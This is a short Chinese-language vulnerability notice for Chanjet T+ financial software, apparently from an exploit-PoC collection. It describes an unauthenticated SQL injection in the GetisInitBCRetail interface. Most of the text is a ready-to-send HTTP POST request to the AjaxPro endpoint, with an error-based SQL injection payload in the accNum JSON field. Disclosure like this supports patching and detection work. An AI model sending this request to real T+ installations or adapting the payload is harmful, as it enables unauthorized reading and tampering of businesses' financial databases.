漏洞描述
畅捷通T+是一款面向中小企业的财务管理软件,提供财务、业务一体化的管理功能。其 GetisInitBCRetail 接口存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句,未经授权访问或篡改数据库中的敏感数据,可能导致数据泄露或系统被破坏。
畅捷通T+ GetisInitBCRetail /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx SQL 注入漏洞
PoC代码
POST /tplus/ajaxpro/Ufida.T.SM.UIP.Tool.AccountClearControler,Ufida.T.SM.UIP.ashx?method=GetisInitBCRetail HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Connection: close
Content-Length: 210
Content-Type: application/json
Accept-Encoding: gzip
{"accNum":"1' AND 5227 IN (SELECT (CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (5227=5227) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(120)+CHAR(113)))-- NCab"}